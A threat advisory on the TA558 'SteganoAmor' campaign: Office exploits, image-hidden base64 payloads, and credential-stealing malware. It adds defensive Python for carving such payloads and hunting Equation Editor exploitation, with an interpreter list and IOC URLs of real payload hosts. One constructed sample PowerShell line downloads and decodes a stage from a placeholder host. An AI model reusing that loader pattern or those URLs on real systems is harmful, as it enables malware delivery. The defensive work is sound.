April 17, 2024
Severity
High
Analysis Summary
The TA558 threat group has been using steganography, hiding malicious code inside innocuous-looking images, to infect targeted systems with multiple malware tools.
Steganography conceals data inside seemingly innocent files so that neither users nor security products notice it. TA558 has been a recognized threat actor since 2018, targeting travel and hospitality businesses worldwide, with a particular focus on Latin America.
Security analysts uncovered the group's most recent campaign, which they named "SteganoAmor" because of its heavy use of steganography. In this campaign the researchers identified over 320 attacks affecting a range of industries and countries.
“It uses long chains that incorporate a variety of tools and malware: Agent Tesla, FormBook, Remcos, LokiBot, Formbook, Guloader, Snake Keylogger, XWorm, and others,” warned the cybersecurity researchers.
The attack chain starts with malicious emails carrying seemingly harmless document attachments (Word and Excel files) that exploit CVE-2017-11882, a Microsoft Office Equation Editor vulnerability that was patched in 2017 and is still frequently exploited. The emails are sent through compromised SMTP servers, so they originate from legitimate domains and are less likely to be blocked.
If an older, unpatched version of Microsoft Office is installed, opening the file triggers the exploit, which downloads a Visual Basic Script (VBS) from a legitimate paste service. That script then retrieves a JPG image carrying a base64-encoded payload. PowerShell code embedded in the image downloads the final payload: an executable stored in a text file as reversed base64. Researchers observed multiple variations of this chain delivering a wide range of malware families, including:
- Agent Tesla: Spyware and credential stealer that records keystrokes, grabs clipboard contents, takes screenshots, and exfiltrates other sensitive data.
- FormBook: An infostealer that harvests login credentials from several web browsers, takes screenshots, logs keystrokes, and can download and run files on command.
- Remcos: A remote access tool that gives the attacker control of the compromised system, executing commands, intercepting keystrokes, and activating the webcam and microphone for surveillance.
- LokiBot: An infostealer that targets usernames, passwords, and other data held by many commonly used applications.
- Guloader: A downloader used to deliver secondary payloads, which are usually packed to evade antivirus detection.
- Snake Keylogger: A keylogger that records keystrokes, grabs clipboard contents, takes screenshots, and harvests login credentials from web browsers.
- XWorm: A Remote Access Trojan (RAT) that gives the attacker remote control of the compromised system.
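The two decoding steps in the chain above (a script hidden as base64 inside a JPG, then a final executable stored as reversed base64 in a text file) are easy to check for during triage. The following is an added example written for this advisory; it is not the campaign's code nor any vendor tool. It carves whatever is appended after a JPEG's End-Of-Image marker, decodes any base64 run found there, pulls URLs out of the result for IOC matching, and decodes the reversed-base64 text stage to test whether it is a Windows executable. All sample artefacts are constructed inline, and the hostname stage.example.invalid is a placeholder, not an indicator.

```python
"""Triage helper for a staged, image-hidden payload (added example)."""
import base64
import binascii
import re

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
# A run of base64 text long enough to be worth decoding, with optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(rb"https?://[^\s'\";]+")


def carve_trailing_data(image: bytes) -> bytes:
    """Return the bytes after the last EOI marker; b'' if the file ends cleanly.

    Base64 text never contains 0xFF, so for this chain the last FFD9 in the
    file is the real end of the image and everything after it is the trailer.
    """
    if not image.startswith(JPEG_SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    eoi = image.rfind(JPEG_EOI)
    if eoi == -1:
        raise ValueError("truncated JPEG: no EOI marker")
    return image[eoi + len(JPEG_EOI):]


def decode_base64_runs(data: bytes) -> list[bytes]:
    """Strictly decode every long base64 run in data, skipping runs that fail."""
    decoded = []
    for match in B64_RUN.finditer(data):
        try:
            decoded.append(base64.b64decode(match.group(0), validate=True))
        except binascii.Error:
            continue
    return decoded


def decode_reversed_base64(text: bytes) -> bytes:
    """The final stage is base64 written backwards: reverse the text, then decode."""
    return base64.b64decode(text.strip()[::-1], validate=True)


def is_pe(blob: bytes) -> bool:
    """Cheap executable check: a Windows PE file starts with the 'MZ' DOS header."""
    return blob[:2] == b"MZ"


def triage(image: bytes, stage_text: bytes) -> dict:
    """Run both checks and collect URLs from the hidden script for IOC matching."""
    trailer = carve_trailing_data(image)
    scripts = decode_base64_runs(trailer)
    urls = sorted({u.decode("ascii", "replace") for s in scripts for u in URL_RE.findall(s)})
    final = decode_reversed_base64(stage_text)
    return {
        "trailer_bytes": len(trailer),
        "hidden_scripts": [s.decode("utf-8", "replace") for s in scripts],
        "urls": urls,
        "final_stage_bytes": len(final),
        "final_is_pe": is_pe(final),
    }


# --- constructed sample artefacts (not real campaign files) -----------------
HIDDEN_SCRIPT = (
    b"$u='http://stage.example.invalid/final.txt';"
    b"$t=(New-Object Net.WebClient).DownloadString($u);"
    b"$b=[Convert]::FromBase64String(-join $t[-1..-$t.Length])"
)
SAMPLE_JPEG = (
    JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\x00" * 64 + JPEG_EOI                  # minimal JPEG-shaped body
    + base64.b64encode(HIDDEN_SCRIPT)          # script appended after EOI
)
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"       # stand-in for an executable
SAMPLE_STAGE_TXT = base64.b64encode(FAKE_PE)[::-1] + b"\r\n"  # reversed base64 text

if __name__ == "__main__":
    for key, value in triage(SAMPLE_JPEG, SAMPLE_STAGE_TXT).items():
        print(f"{key}: {value}")
```

Run it on a suspect JPG and text file by reading them as bytes and passing them to triage(); a non-empty trailer, a decodable script, and a final stage that starts with MZ together reproduce the chain this advisory describes.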
Malicious scripts and final payloads are frequently hosted on legitimate cloud services such as Google Drive, whose good reputation helps them evade antivirus detection. Stolen data is sent to compromised legitimate FTP servers that serve as command-and-control (C2) infrastructure, so the traffic looks normal. Researchers identified over 320 attacks; most hit Latin American countries, but the campaign has a global reach.
Because the chain depends on a seven-year-old vulnerability, defending against SteganoAmor is straightforward: updating Microsoft Office to a version that includes the 2017 fix for CVE-2017-11882 breaks the initial exploitation step.
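Patching removes the entry point, but a hunt across endpoint telemetry will tell you whether unpatched machines have already been hit. The following is an added example, not code from this advisory or any vendor product. It relies on one background fact: CVE-2017-11882 lives in the Office Equation Editor, which Windows runs as a separate COM server process, EQNEDT32.EXE, so in the chain above it is that process, not WINWORD or EXCEL, that ends up launching the downloaded VBS. The hunt therefore flags Equation Editor spawning a script host or shell, or opening a network connection itself. The events are constructed for the example in a Sysmon-like shape (EventID 1 = process create, EventID 3 = network connect); the field names and the interpreter list are assumptions to adapt to your own telemetry.

```python
"""Hunt for CVE-2017-11882 exploitation in process telemetry (added example)."""
from dataclasses import dataclass

EQNEDT = "eqnedt32.exe"
# Interpreters and LOLBins the exploit chain is likely to launch (assumed list).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass(frozen=True)
class Finding:
    computer: str
    rule: str
    detail: str


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows path ('C:\\X\\Y.exe' -> 'y.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events: list[dict]) -> list[Finding]:
    """Return one Finding per event that matches either Equation Editor rule."""
    findings = []
    for ev in events:
        computer = ev.get("Computer", "?")
        image = image_name(ev.get("Image", ""))
        if ev.get("EventID") == 1:
            parent = image_name(ev.get("ParentImage", ""))
            # Equation Editor has no business starting a script host or shell.
            if parent == EQNEDT and image in SCRIPT_HOSTS:
                findings.append(Finding(
                    computer, "eqnedt32_spawns_interpreter",
                    f"{parent} -> {image}: {ev.get('CommandLine', '')}"))
        elif ev.get("EventID") == 3 and image == EQNEDT:
            # Nor should it talk to the network (the VBS download stage).
            findings.append(Finding(
                computer, "eqnedt32_network_connection",
                f"{image} -> {ev.get('DestinationIp', '?')}:{ev.get('DestinationPort', '?')}"))
    return findings


# --- constructed sample events (not real telemetry) ------------------------
EQN_PATH = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
SAMPLE_EVENTS = [
    # Normal: Word opened by the user.
    {"EventID": 1, "Computer": "WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\ana\\Downloads\\invoice.doc"'},
    # Equation Editor started via DCOM; on its own this is not a hit.
    {"EventID": 1, "Computer": "WS01", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": EQN_PATH, "CommandLine": '"EQNEDT32.EXE" -Embedding'},
    # The exploit running the downloaded VBS.
    {"EventID": 1, "Computer": "WS01", "ParentImage": EQN_PATH,
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\ana\AppData\Local\Temp\update.vbs"},
    # The exploit fetching the script (198.51.100.23 is a documentation address).
    {"EventID": 3, "Computer": "WS01", "Image": EQN_PATH,
     "DestinationIp": "198.51.100.23", "DestinationPort": 80},
    # Normal: an admin's PowerShell session.
    {"EventID": 1, "Computer": "WS02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.computer}: {f.detail}")
```

Feed it your own exported process-create and network-connect events in the same shape; any hit on an endpoint is a reason to pull the originating document and check it against the IOC list below.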
Impact
- Sensitive Data Theft
- Data Exfiltration
- Unauthorized Access
Indicators of Compromise
URL
- http://107.175.31.187/30008/ENIN.txt
- http://170.75.146.119/mokkhkhkhkhkhhkhk.txt
- http://bolandraf.com/prostutefiles/droibase64mohammedupdatedfile.txt
- http://bolandraf.com/prostutefiles/droidpedophylebase64.txt
- http://107.173.4.15/35005/HZA.txt
- http://107.175.113.216/xampp/krm/KRMC.txt
- http://107.175.31.187/21113/imageforlovers.jpg
- http://23.94.206.107/75099/pixelreturn.jpg
- http://104.247.204.205/microsoftdetecthistorycachecookieentirethingsfromthepcfordelete.Doc
- http://23.95.235.35/feelinggoodwithlovertounderstandhowmuchilovingherwithlotoflove___trulylovingtheheartwithlovertokissmehardtolove.doc
- http://192.3.95.131/www/OIOI0OIoioioi0oioII0IoioioiOIOIOioi000oi00oiOIOI0IOIo000000%23%23%23%23%23%23%23%23%23%23%23%23%23%230000000%23%23%23%23%23%23%23%23%23%23%23%23%23%23000000000..doc
Remediation
- Block all threat indicators at your respective controls.
- Search for the indicators of compromise (IOCs) listed above in your environment using your respective security controls.
- Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
- Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
- Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
- Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
- Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
- Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
- Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
- Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.